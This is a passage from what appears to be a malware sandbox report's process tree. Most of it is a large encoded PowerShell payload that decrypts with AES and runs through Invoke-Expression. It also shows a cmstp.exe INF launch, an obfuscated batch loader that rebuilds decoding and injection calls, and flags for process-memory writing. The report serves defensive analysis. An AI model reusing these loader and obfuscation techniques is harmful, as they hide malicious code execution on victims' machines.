AHEAMQBlAEcAZgBJAGkASQB2AG4AMQBJAEUANQBtAGYAYQA0AHoAcQBMAHgAOAB2AHQAaQBKAHQAUwBTAGwALwBlADMARABqAG4ATgB1AE4AQgBXAHMARgAyAE8AWAB1AE4ASgBGAHoASQAxAEcAVAB2AEYAdQBDAC8AQwBlAE4AOAAxAFkAbQA3AEEATwBUAFoAWgBKAGUAagBzAGYAUABTAEsAbwBqAEYAaABoADUAUQBjADkAUQA3AGsAdABUAGcAYgByAHgATABXAEwAVwA5AG4AaABlAHkAYQBIAHkAdwBJAHgAUQBvAFMAWABJAFYAVwBPAEkAZgArAHAAVABVAGwAUABKAFgAQwBUAHgAWQB1AG0AUQA0AEEAYgBuAEYAZwBjADkAKwB0AFAAcgBaADUAYgAvAGQAOQBIAHoASgBYAEkANwBjAG0AMgBaADgAWQBiAGEAcABjAEgAZQBZAFMAUQB6AEUAbgBJAGcAOABoAGwAWABEAFoASQAwADEANQBlAHIASgB1AFAAegByAFkAawA3AHoANgBzAE8AMwBNAHUAeQBhAFkANABoAG4ATwBXAEwAaQBUAHoAdwB4AHkARABvAEkAMwAvAGIARgBFAEgAaABnAHQAeQA3AE8AdABOAEsASgBaAFYANQBrAFcANABqAHYAaABPAC8ASwBBADAAQQBtAHMAbABsAHkAawBwAGoAdQB2AEUAWQBMADAAZgAyAGEAVgBCAHcAcABLAHMAOQBZAEoAdABKAE0AQwBaAEMANwAvAFUAcwBTAHcAOQBxAEYAUgBlAGEAcABXAGcATQA4ADIANgB3AGkAOQA4AG4ANQBwAFoAZABCAE0AWgBEAEYAeQBoAHgAcABsAFUAWQBLAFoARAB1AGsAMgBlAEgAOQBoAGkAOAAxAGsAZwBTAFYAbQBhAHMAdwAyAEkAMAA2AGsASABEAFAAZgBWAEEAOABjAG4ARwBUAEoANgBzADAAeQBQAEgANQByAG4ASwBaAHYAZwBIAC8ASwBGAGcAegAxAGIAMwBKAFMAUABiAFYAcQArADUAYwAvAFAAWgBwAFIAdgAyAG0ASwBhAFEAQgBiAFAAKwBnAGUAcQBoAFIAawBCAGoAbQBkADUAVgBGADIAQwB3AFMAQwBBAGkALwAyAEYAVABDAEgAZwBvAHAAQgB0ADcATwBsAEEAOABsAGMAcQBiAEwAUABpADcAWgBiAEUATwBSAHEAQgAxAHkAcgBvAEwAdAB3ADIAWAA3AFEAVQBaAEgAQwBWAFcAUgBHADIASgB1ADAARwB1AEIAUABJAFMAVwBpAGgAYQBRADUARgBUACsAVABGAHEAbgBGAE4AVgBZAGEAeABNAEUAMQBkAHYAUgBjAG4AeQBSAGkAZgA4AEcAcgB2AFEATwBKAGgAMwAxAHcAOQBSAGQASgA3AHkAdABTAC8ASQBCAEgAWQBxAGUAdQA3AC8AVwBOAGwARgBlAHYAdwBVADYAcgBrAFQAVABlAHYAaQBtADgAdgBpAFcAOQBzAEEARwBwADAAOABzACsAQgBMAGIAZQA1ACsAeQBnADMAbQBqAHcAUQBHAEwAOQByAHkAaABBAFAATgBZAEMAYQBNAGkAWQA4AHQAQQBwAEkAMwBFAFgASAAxAHIATAAyADEASABVAHoARwBnAFQAaAB3AHAAcwBiAEYAQQBVADIAbgBjADkAWAA1AGcAOQBMADMAbAA3AHQAOQBVAHMAcQBQAGwAWABvAFkAQQBGAG4AZQBTAEQAeQBoAGsAWgBSAG0ATwAxAGoAQgBmAGIAMwBJAEkAawB0AFQAQQBuAHAAagBaAHYAaQA0AE8AYQB1AG4ALwBvAGsANgBrAGEAdQBIAHQAeQBxAE4AOQB0ADYAVQBZAG8ATwBSAEIAYwBkAEgAcABLAFcAQQBkAFgAMwBYAFUAbQBLAFgASgArAEUAKwA2AEwAUgB6ADkAUABNAEUAdABWAGkAUABpAEEATQBoAGkASQBZAGsAVAB4AGcAbgAwAEsAdQBxAHMAdwBLAEkAQwBrAG4AbwBwAHMAbABYAGYANgBwAEQAcwBpAFIANAB2ADEATwAwAGoAZQB0AGoAQgBBAEcAegA2AFkATwB6AHgAKwBpAG8AbABYAEEASQBJAEYAbwBJAFgAawB6AHUAdAAvAHUAUQA0AEoAZQBpADMAZwBFAHQAQgBQAC8AVQBBAEIAQgBwAEQAYwAyAHUAeQBkAHoAbwBTADYAWQBVAFEAdwBkAEsAVwBrAGwAYgBPAHgAWgBHAFAATQBPAHoAQgB5AHgANwBJAFAAYwBCAFkARABDADUAWQAwADYARABYAHUAVgA5AFIATwBsADUARgBMAGwASwB4AEQAcQBVAGEANgBWAFUARwBBAG8AZgBqAFEAYwBXAFEAMgBYAGkAYgBUAEUAUgBMAGkAdABvAFcAYQBjAFYAVgBCADEAOQA2AGEAQQBHADYAdgA4AFUAYgBHAG4AMQBiAGUAWQBJADcAQQBhAGEAcABJAGYAZgA3AE0ANwBQAFgAZgBHAEkAUwBlADYAYQBaAEgANQAwAGUASQBLAEIAaQBOAFQAYgBQAGwAdgArAHIAUAAzAG0ARwBIADcAeABUAEkANABiAFQAYwB0ADUAZgBrAFMAcAA1AEEAVgBPAGYAdQB0AEIAdABoAGkAeQBzAFcAZQBUAC8AMABHAEEAagBKAFYAegB4ADMAQgBrAGkAUgBtAGYAdABCADAASQBQADgAMgBtAE4AVAByAEEAYQBNAHoARABCAEUAaQBRAGMAbABkAGMATQBVAG0AYQBPAGoAVgAwAFEAdQAzACsAUwBtAFYAUQBPAEYAKwBqAFAAaQBFADUARgBKACsAMwBjAHAAegBpAFgAWgBvAHYATQArAHMALwBiAGgAVQA0AE4AYgBGAHMAcQBHAHoAbwB1AG8AUQBHAGcAbgBrAEcAOABCAEkAQgBrAGcAbABwAGYAMQBPAFQAMwBDADgAMAB5ADcAYwBEAG4AUQBIADcAawBNADMAUQB1AFcASABMAEUAZQBaAFIASgB3AEYAbgBUAC8ARwBRADQATgBJAG0AcwBlAHcAdwB2AHMAdABSAGwAQQBjAEMAagBnAGQAUwBEAGoANAAvAG8AMABXAHYAcwA1AG8ATQAzAFoANwBCAEQAZAA3AEwAZwBXADYARABjAHIANABDAGQAbgBrAGYAUQBJAGEATwBDADAAawBNAEsAVgBzAFUAVgBuAHIAZwBhAEoAQQB2AHoAOAA4AGEAQwBqADgATQBJAHQARgBsAEcAMQBqAHQAVQBMAG0ASwAyADgAQgBvAHEAOABpAG4AagAxAEcAbABCAHUAegBKAFgAcQAwAG8AMgB2AGYARQBJADIAcgAwAEkAcgBEAHMAdgBHAHoAeABJAGkARQBMAEsAUwBOADkALwByAE8AOAAxAEIAaQBJAFUAagBTAEQAaQBhAEcANwBmAEgASAArAGMAZABiAFIAZwB1AG8AMgBOAFIAMgB3AE4AUwBPAG8ARABZAFcARABUAEcAVQBJAGoAUgBmAHIARAB3AGkARgBaAGQAeABqAHcAdgB1AEYAcAArADMAYwBXAG4AbAAwAGUATQB2AHgAUAArAFIAOQBMAGwATABjAFUAYwBZAGgAeABSAE8ASQBHAFEASQB0AEcAdgBTAHgAQgBNAHoANAA3AE8AOABDAEoALwBkADAAMABGAFAAZABlAFAAcAB1AEUARwA5ADYAVwB5AHUARwBWAGUAYgBuAEcAcQBpAGsATwBpAGsAUQBDAGYAQQBDAHAAdwAzAGMASABWAFYAbQBuAEwAbwA0AFIATgBSAEQARQAyAGUAbwBXAHEARQBwACsANQBjAFEALwB0AEgAbwBLAFQAUABrAFIAbgBZAGsAVgBVAHgAcgBVAGsAUAB4AFQALwBwAFkAbQBGADIAZABQAGsATgBBAE4AMQBWADIAZABSAGYAYQBsAFMAMgBlAE4AeABnAHoAUQBzAHYARgB1AFMAYQAwAGIAcAB1AHgAOABsAFIATQA2AEkAeQBlADcASwBlAFYAcgBmADgAUABLADgAYgBYAEIAMABDAEUAMwBBAFgAcABNADEAZwBWAEMAUQAzAGYAMAB2AEkANwBlAEsAWgBNAHoAVAAwAG0AawBWAG8AWgArAHgAOAA0ADgANABmAEkAUgB4AGMAbwBlAFIAKwBnAFYAaQA3AGMAZgB5AE8AegB2AE4ASwB6AFoAMQA4AE0AagBFAGUAMwBIAFkANgBnAEEAMwBuADEAOQBlAEcAYgAxAE4AVwBOAFEAWABPAEgAagBsAE0AVgBaAGcAYgBHAEMAVgBJAGUARABTAFcAawB3ACsAZQBzAHgAZwAzADgAcwBrAEgARABCAHcAVABlAFoAWQA1AGQALwBPAFYAMgBhAFAAZQAwADQAZABkAEIAQwA5ADQAeQBrAHgAbwBzAEUAcwBzAHUAWABoAHYAdQB3AEIAdgA0AFUAagAwAE8AQgBkAHgAawA3AGIATQBMACsARwBZAFQAeQByACsARQA5ADAAUQB4AHIAZwA0AFgASwBSAFQATgBiAFQAcgAxAE8AbQBFAFQAaABTAE4AOABOAFAATQBZADAAMgAzAGoAawBzAFAAawA4AG8AVABuAEEATAAxAGMAUQBGAFoAVAArAHAAcwBoAGsAeQBiAG4AUABqAFoAcABLADIAcABCAFAAagB0AHkATABKAG8AWAA4ADMAcgBTAGIAUgBBAEsATQBhAFAASwBWAHIASgBZAGYALwBvAHEAcAAvADIAKwBUAGkAbABrAFgAVAA3AGsAUQBUAFcAYwBvAHcAagBrAHMATABmAGkAYwBXADMATQAvAHYAOQAzAHIAdAA0AHcARABHAGoARwBYAGwAdwBKAEEAdQBlAFUALwB4AFkAeQBTAEIAegA1AHUAcwBYAEgASgBJAEcAOABqAHEANQBOADcAYQAwAGkAUwBzAG8AawB3AEkASwBmAE4AZQAyAEYASgB3AGsASwB6ADYAcwBTAHQASABZAGYANQBOAGoAKwBEAHUAaQBQAHEAMwBWAGYAYwBLAFAARwBnAGwAUwBkAGIATQBsAEIANwAyAEgANQBhAE8ATwBhAFgAWABVAGMAYwA2AFMAbgBqAE4ALwBiAGEAMwBDACsAZQB4AFQAaABSAFQAcwBhADQAMgBzAGgAdgBYADAAYwBnAFcANgA1ADQANwB5ADIASABjAE8ASAB4AE0AWQB1AHAAegBiAFMARAAxAFgARgBpAEwAMABYAHIAQgB4AFMAUgBPAE4ASwBlAFEAUAA5AGkAVQBFAFgAbAAwAHcAdQAyAHUAeQBNAEIAVgBwAHQAQgBRADYAUQArAGcAVQBQAFUAZgBpAFAAdQBBAGkAUgBPAE8ATwBwAGgAMABCACsAUwA0AE0AYgB2AFAAbwBZAGYAZgBDAFMAMQAxAFUASAAyADIAUgBEAEsAUQBrAGcAOQA4ADUAMABSADcASABzAGoAbAByAGMAYwBjAEgAdgBvACsAMQBaAG4ARgAvADcAagBWAEsAVAAzADkAWAB6ADAAUwBqAFAAaABXAGMAWQBUAEoAQwBSAFoARABkAG8AQwBVAHYAdwBiAFEAUAB2AG8AawBCAEEAQgA3AHMAMABPAEsAZAB4AGUAVABhAHUAUQBrAFgAagBOAGIAVgBiAHUAawBpAGcAWgBqAFoAQwBHAE4AWgB6AG4ASQAvAEIAZgBqAHAAcwBXAEoAcQBPAEcASwBkAEYAbwBtAHAAdwB1AGoANgBPAFMAUgA4AHkALwBIAFoAWgB2AGYAYQByAHUAQQBRAE0ARABPAHgAWgBEAFAAagBhAFcAVwBxAE8AWgByAHoAcgBBAHYASABPAEsATwAvAGIARgB5AEIALwA3AC8AcABXAG0AawBLAEQATwAzAFEAdwBpAGkAVQAvAFUASgBMAEMANgBGAFkAUwBNAG0AegBTAGsAMgBhAFQAcwBrAHUAVwBGADQAcwBKAFcAYwBmAGEAbgA2AFQAbgBaAGYARQBYAG8AUAB3AEwAUwByAHgAWQA4AHEAawBuAHgAWAB6AGMATgA1AE4AUABiAEwAaQBXADEASQBUAFgAeABYAGgAZgBxAFAAYQBpAGQAZAA4AEgATgAzADEAWgB6AHEAQQB4AEUAVwBVAGEASgB6AHYAdgAwAHQAQgBXAG8ASwB1AHkAcQBFAGIARwB3ADYAQgBRAGoATABFAFoATQBZAEYAVQB6AE0ANgBxAG4AbAB6ADQAKwBDADUASQBpADkAQwA5AEsATQB6AE4AdQBIAHQAMwBzAEwARgB6AEsAUABjADMAbgB4ADkAUwBlAEQARABOAFAAaQBUAE4AKwBSADAATwAxAHQAUQBNAHUATAByAEgAVABtAHkAcgBwAFUANQBsAGMAVABmAGsANgBiAFQAbgBFAFMAdQBlADEATwAyADgAWABjADcAYgBiAEYATQAxAFgAVQAvADkAOABMAE0AegBrAFYAbgBVAGkAbQBaADUAcgAwADUAYQArAHIAZQA3AEQAYgBXAGkAbwBLAHEAcABuAHoAUABrADcAcgBrAGcASQBBAHcARAB6AGgASgA5AE4AUgBEAEsAdgBhAFMAVQA1AHEAMwBNAFkASwBKAGwAKwBtAHAATAA4AE8ARgBuAEoAcAB2AHgAcABWAFgAQwBEAEMASQB4AFQAcQAwAHMANABrAFMASgBzAEMALwBhAFcAMwBBAGIALwBzAFQAeABpAFoAUgBmAEYANQAyAGIAUgByAFoARABJAFYAMQBqAFAAKwBBAEQAZQB4ADQAeABsAFIANABkAGoAMwBRAEwAMgBJAHIAYQBaAHQAcwAvAEMAVABPAEsAVAAvADkARwBKAEsAeQBoADcAcQB1AGEAeAArAEoAeQBsADYAUQBxAFUAKwBrAEQAMgA4AHEANwBpADMAZABFAEwARwBUADcARwBiAGgAcAA0AGcAbgBjAFUAKwBmAFYAZwB5AFkATQB0AHkAdAAxAHIAbgA0ADcAVgBBAFYAUgB2AEcAMgBoAHkAeQB2AC8AbwAwAEYAYgBpAFgAZgBrADUATABVAEEAZABhAGEAcgB4AHMANAArAFAAegA0AFEAQQB6ADkANQArAE4ATgBkAGYAZABTAFkAQQBkAHkAeABVADUARQBEAFgAaAB5AE4AWgBTAHIAdgB2AFoAQgB5AG4AUgBaAGsAZwBIAEUAcABKAEwATwBLAFMAdwBSAG4ASAA4AEoASAA2AFYAdQArAEwAdwBEAHMAaABDAFYAUQAxAEEANwBDAFAALwBGAFYAVwBwAEwAYwBZADMAVQAzAHYATAB2AGsATgBBAFQANgArAG8AdgA5AFUASQBtAHAAWQBIADEAaABoAFQAbgB2AGsAdQBpAE0ANQBVAE4ASAB6ADQAcQBXAGwAdgA3AGsAVgA1AHcAZQBRAFUAbwArAEsAZAB0AG8AbABQAFoAVwBmAC8AYwBIAGYAdABUAFcAawBOADkAQwBGAE0AbQA2AE4AVwBMAFcARgBmAHMAegA4ADMAVABjAGMAdgByADQAKwBzADgAcgBBAGoAVAAwAFQAMABZAG4AOABtAEIAZwBYADMARgA4AEEAZAB1ADgAMQBvAEIAcgArAGMAUQB6AFMAcwBVAGIAWgA3ADkAMABJAHQAdQBVAE4AMAB3AHgAagBsAG8ASQBuAHEAagBGAFcAdQBqACsAMQA0AG0AeQBkAGMASwBaAHAAMQBaAFIARAB1AFgARgBQAGIAawAxAGIAUQBWAE4ASABjAGEASwB3AHEANgAxAHMAUwB3AG4AUgB3ADYAegBBAFcAMgBlADgATgB2AHAAZQBXAFIAVgBMAGEASABlACsAUQBWAFkAagAwAEEAVABzAHIAbgB5AFQANQBpADAAaQBwAGcANgAxAFMAdQBsADQAMQAyADUARwAwAG4ANQBIAEsANgBFACsAMgBiAHAASQBqAFQAdABXADgAdwBHAHgAVgAyAFkAQwBHAHIAWgBkAHkAWABsADIARQBLADQATgBBAFIAMwBzAE4AeAAvADEAZABRAHEAYgBEAEwANQBjAE4AVABZADAAUQBoAHMAVgBmAGkAYwBXADgAbwB3AG4AMwBWAHMAVQAvAGcASwBHAFYASwBBADUATgBWADcAQwBmAGIAZQBlAHYAagBSAHEAMQA4AHIAcgAyAEYAOABZAG4AWABzADcASgA4AFoAMgBxAGMAMgB0AFQASgBiAEcAVQA4AE4ATwBWAHEAMABtAHAAYgBaAEgAVQBhACsAagBHADMAYgBTAG0AWQA5AE4AZQBVAEIARQBlAFkAbwAvAG4AcgBxAFEASQAyAG8AcwA2AG4AQgB0AGgAegB1ACsAUgBCAGUAdgB4AFQANgBuAGUAcABCAEgARABwAGsAVQBPAHgAQwBVAFAATgBGAE4AMAAxAHMANQBuAFcAawBOADUATQBRAGsAdQBIADUALwBmAFQAZQBEAHQAaABFAHIAagBkAHIAYQBRAGYAbAA1AEEAdwBpAHYAZABlADUAcAB1AHEARwBVAHEAZAB0AGwANgBUAC8AYQAvAEQAdAA5ADYAVwByAFYANABNAFoAUgAzAHIAcQBhAEYANABVADYAZAA2AEUAeABjAGEAdwBUAHQAZABnADYARwBDADMAbABKAEsAUABXAGwANwBFAFcAVgB6AGUAUgBRAEwAegAxAHEAeAArAEgAQgBUADUANAAyAEYANQA4ADQARgB6AGYAWgBzAFoAdQBlAC8AcABaAE0ASwA3ADMAQQBmAGoAaABnAE4ANgBqAFEAaABYAGgAMwB0AHgAZQBJAGEAMQBMAEQARgBWAHAAZABYAEUARQBhAFoALwB6AEIAcABpAHEAVQBzAEgARwBRAFcAegBOAFAAaQBwAGQATABBAEoAdAA3AC8AdgBiAEcASAA0AE4AMQBWAEwASwB5AGwAagBwADMARwA2AHcAdABkAGcAVABCAHMARABxAEEAZwB0AHoAVwAzAFEASwBXAFcATQBTAEoAMQB0AGYAeAB2AEIAMwA5ADIAVgAwAGUASgBCAHcARABzAFQAVABlAFgAZgA3AC8ALwBaAHQAegAvAGoAUQB6AG0AVABsADQASgBHAFIAeQBDAFEAMwBOAEoARwBkAGgAbwB6AGoAdgBvAGIAVABBAGwASgAwAGMAOQBrAE8AVwAzAHcAZgBTAFUAaAA1AEsAVQA2ADAAMgB0AGoAUwBjAGwAOQA2AFEAWAA4AEkAeQArADcAdQBZAHoAbgBOADcAbQAvAG8AQwBCAG4AUQBBAEEASwBxAEIAMgBXAHoAeQB2ADIAWgBGAEYAKwBKAFoARwBqAHcASABVAEcAdAAvAGQARQBPAHkAeQA5ADYAcgAwAFUAegB1AFgAUQA5AG0AOABaAHkAUABsAE8AdAByAE4AdwBUAGoASwBYAFUAVAByAGYALwBiAHAAZABOAEgALwBPAEwAegAxAEkAUQBCADYAMQBqAFUASQBUAEUAVwBBAEgAMQB1ACsASgBzAFAAbwBnAHcAeABIADUAVABoAEsAcgBZAGUAaQBQAHoAMgA1AGgAUQBzAG0AdQBlAFkAbQBuAEgAMwBoAFkASgB3ADgAMwA2AGQAawBuAHgAMQB4AG8ATABBAFIAZQBhACsAZwBOADYARQBaAEEASQBpAEsASgBuAFAAVgBGAEsAUQA0ADEASgBGAEQAcgBiAHAAcwBlAE8AQwBjADUAagBNAHkAawBDAHcAMABIAFQAcQA1AEkAUwB1AHkAcAByAGUAbABlAHUAdABFAEQAWgBpAHcAOABSAFcATQBpAGsAbQAwADQAYwBqAGMAagBEAHoATQBSAHkARQA3AE4ARgB3AGQAUwBaAC8ARgByAEgAbAB1AEkALwBMAGEASwBNAHEAeABNAHcAYwBrAHAAZABoADUAKwB4ADYAYwBvAGYASQBWAFoAVwA0AGQATwBsAGsANQBxAFkAcABGAHYAegBDAEEAQwA2AEMASwBwADUAUgB6AEMAYwBGAFYANQBEAE4AVgA4AFUAcAB4AEwAZwBYADcAMgBhAEIAOQBLAHgANABHAHEAdQBlADUANwBFADQAdQBpAG8AcwB4AFUAWQBzAHIAZABrAHUAagB0AHcAZwB3AHIAWgB5AE0AegA0AGkASwB1AGUAdAA0AFkAMQBpAFUAQwB2ADgASgA1AFYAYwBUAEgAOAA0ADIAQQByAFMAbAB2AHAAcgB3AGYAQgBtAFIAUQBCAHYAMABCAG8AUQBjAHEATABsAG0ASQBCAEIARgBVAGgAbQAyAGYAQQBuAHoAaQArAFAAOAAwAE4ANwBkAFgAZwBrADQAYwBXADgANgBWAGYARgBLADUARgA5ADgAbgA0AG0AMQBrAFoAdwBsAHcAQwBGAGkAWgBGAGoAYwB0AHcAdABqADAAZABLADAAaQA3AGgAUABGAG8AYwBtAHQAZABYAFoAUwBuAFkAegA1ADUASQB6AGMAQwAxAEsATgBKAFIAawBhAEIAeQBJADEAeQBGADMAWQBCACsAbABZAEEAegA1AHEALwA5AGIASAA0ADgAdABtAGUARgBEAHMAbABqAEsAVgBpADMAZwA3AFoAbwBOADAAQgA4AFEATgBRAGQAZwBwAGgAOABLAGYATgA2AEIAUQByADIAWQBSAFoAUABoAE8AMABFAFIATwBsAGwAVgBFADUATABBAGYASQBzAE8ATwBLAHMAUABrAFkANwAxAGUAVQB6AHYAbwBCAEIAdwBYAG4AWAB1AEcAKwBpAG8ARQAyADgAdwArAHIAVwBDAEQAaAAwAFgARgBpAFEARwA3AEUALwBMADYAMABIAHkAbgBPAEoAYgBBAFEATQBDAFcATgBiAE8AcgA2ADcATABNAE4ALwB6AE8AUwAzAHMAYwBrAFYAVQBRAEgAOABnAGsARgB1AEwAbABuAE0AbgAwAHgAcgB0AGMASgBOADkAOQBaADgARAA0AHgAZABlAEYAKwBhAEsAMgBBAE0ASQBlAGwAZgBDAGEAYwBtADkAdABPADkAZwBqAG4AcQBFAHUAYQBRAG4AZgBaAHYANABZAHoANQBxAEoAawBhADIATABHADMAVABEAHAATQBIAHoAcwBVAEEAcQBTAGMAQgBIAEsAZABjAGEAYwBNAFIAaQA3AGMANABlAEEAbABJAHoARQBjAHUAYQBFAEkATgA4AHMASQBkAEgAQwB6AFUARABGAEwAYgAyAEcAWQB1ADEAbAB1AFAAYQBpAFkAZABNAFEATwBsAC8ASgBGAEgAeAB1AGYAQgA0AG4AcgBtAGoATQBCAGMAdAA3AGQAQwByAGsAWABsAFcANgBqAEkAOQBJAEMAZQB2ADcANwBIAEUAQgBDAHUASQBxAFMAWABBAGUAdQA1AHAAbwByADkAbABRADQANwBrAHQAOABkAGYAMQBPADgAbwBaAHgARABuADEAdwBnADQAVgBqADgAbgBmAFMAcwA2AG8AWgA4AEIAQwBlAHQAeQBvAHQAUwBzAE8AcAB5AEIASgBZAFcAMgBuAGkAcwBGACsAeABPAGQAbwBxAGgAQwBWAGgAKwBEAGgAbgBjAFEAVABUAC8ASwA4AEwAOQA5AHMAaABCAGkAagByAFUAcQBYAFAATgBMAHAASgBsADkAeQBkADgAVwBxADcAZgBIAHUAVgBHAHMAZAByAHkAaABwAGMASQB6AEQAMgBlAHIAegAvAEYAdQBiAC8AOQAwAGkAdQBOAHQARgAyADUATAAvAGoAeABFAHUAbgAwADEAbgBBADMAdgAyAFkANwA3AFQAMgBJAFEANgBTAGIAMQA3AGUAbwBqAGoAOQB4AEMAdwBBAEgAMgA4ADYANABYAHgAawBYAGgAUABXAE8AcQBsAHYAZABpAHcAYwBSAHoALwBXAHkARQBKADMARAAxADkAaQBJAEQAMwBzADkAcwBrAEgAQQBoADcASQBLADYAQQAzAGoAVQBVAGcALwBGAHcATQBkAFQAUAA3AGsARwBtAGUAMQBvAGYAVQBIAC8AQgBMAEQAUgBLAEIAKwBDAGIAOQB4AFAALwBpAGoAVABXAHoAdABSAEIATQBUAFEANwAzADQAcQBBAEIAdAAyAE4AcABDAEsASwBPAEgAawBmAHUAdQBxAHkATwBmAHEAQwBSADYAUwA4AGoAbgBiADMAUABvACsAZwBOADIAOQA1AG4AcQBnADIAMABUAFgAbQBRAEYAcgBmADUAVgBkAGwAVgBKAFQAUgBwADIAbQBKADAAYgBqAFcAbAAyADQAUQBXAFQAYwBJAEUAYQBQAHIAMABtAHoAWgBjAEwAdQA5AHMAQwA3AFAAZAArAFAAKwA3AFcALwAzAGcAYgAwAEwAYQBwAGgASAB2ADEAVwBNADIAbwBjAEIAOABHAFIAbABhAG0AWgBtADgATABNADIAZwBrAFgAYgBEAFoAbgBhAE0AZQA0AG0AVQBGAE8AWABxAGIAegB5AEQAQQA1AG0AbQBzAE0ANwBwADgAYgA2AFEAKwBZAFIATgB3AFYAZQAvAEcAcQA3AEwANQBFADgAaAArAGsATgBTADUAOAA4AFIAOQAxAGIASAA1AHYATQBOAE4AaQBOAEIAbgBZADIAOABRADYANABkAEwAMQBKAG4AMQBlAHAAcABEAEgAOABSAGYATgBpAHoARABhAFEAeQBtAGQALwAyAEQAUwB3AEUARwAwADkAagArAEUAQgBSAHYATABxAEMAcwB2AFcARQBmAEcAOAA3AFMAZgB3AHEAYwAvAFUAZQBlAE8AMgBaAG8AQQBsAE4AMgBXADQAUAA2AHEATQBCADYAUwBoAHgAZQBTAGgAOAB2AEYAbQBiADkAcABjAFEAZQB4AEwAaQBiAFIAeABwAHYAMAB5AFIAOQBCAFkAZgBUAFIAcQBoADYAMwBRAHgAaAByAEcAdAB0AEsAeABSAFAAcwBXAGIASgA1AGUAQwBWAGIAcABuAHkAZwBMAG8AZwBQAEUAUwBjAGIAcgB0AG8AYQBSAFMAZABqAEUAdwBlAFQAdABWAFAARwB5ADYAcgBqADcAdQBYAEEAcwA5AGUAMgB5AHUATAB6AHYARABlAFIAVgBXADQAcwBVAFIAVABJADYAdwA2AFYAbwBNADAATQBSAEoARgBEAFYAMwBRAG4AZgA0AG4AUgBDAFQAQgBGAHEAOABYAEwAUABxAEEAeQB5ADcAWABPAHcAOQB3AFIAZQAyAFMAQwBuAEsAWgBiAFEATABMAFYAWQBHAHcAMgBNAEUAKwA1AEwANQBoAG0AaQBjAGkAeQBhAGwARAB6AFMASQByAEQANQA0AE0ATQBXAGsAMQBDAG0AeQBZADAAagBWADAATAB2AEgASABXAGQAZgB5AGIAOQAxAFAAOQBMAE4AaQBLAFgAaAAzAFMAdwBtAFcAdwBCAFAASAAxAEgAcgBTAFcAagBVAE0AegBOAGQAQgA3AEkAcwAzAFcAcgBuAE4AQwBEAHcAcABDAEYAVgBXACsAVQBVAEkATgB4AE4AbAAxAHkAWAB5ADgAYwBFAFIAUgBTADAAcgBCAFMAWABPADYANgBDADYAZQAvAFAAMgBjAHYAWABnAHIAeAB0AE4AQQBKAFQAVwBjAE0ARgBBAEEAPQA9ACIAKQAKACAAIAAgACAAJABpACAAPQAgACQAZABbADAALgAuADEANQBdAAoAIAAgACAAIAAkAGUAIAA9ACAAJABkAFsAMQA2AC4ALgAoACQAZAAuAEwAZQBuAGcAdABoACAALQAgADEAKQBdAAoAIAAgACAAIAAkAGEAZQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAAKACAAIAAgACAAJABhAGUAcwAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJABhAGUAcwAuAEsAZQB5ACAAPQAgACQAYQAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAGkACgAgACAAIAAgACQAZABlAGMAIAA9ACAAJABhAGUAcwAuAEMAcgBlAGEAdABlAEQAZQBjAHIAeQBwAHQAbwByACgAKQAKACAAIAAgACAAJABvAHUAdAAgAD0AIAAkAGQAZQBjAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAZQAsACAAMAAsACAAJABlAC4ATABlAG4AZwB0AGgAKQAKACAAIAAgACAAJAByAGUAcwAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdAApAAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHIAZQBzAAoA -inputFormat xml -outputFormat text3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zafaddvf\zafaddvf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83B7.tmp" "c:\Users\Admin\AppData\Local\Temp\zafaddvf\CSC9B49175D5FE443E08CDBC647BCE6790.TMP"5⤵PID:3188
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\wbbnatzg.inf4⤵PID:1652
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', 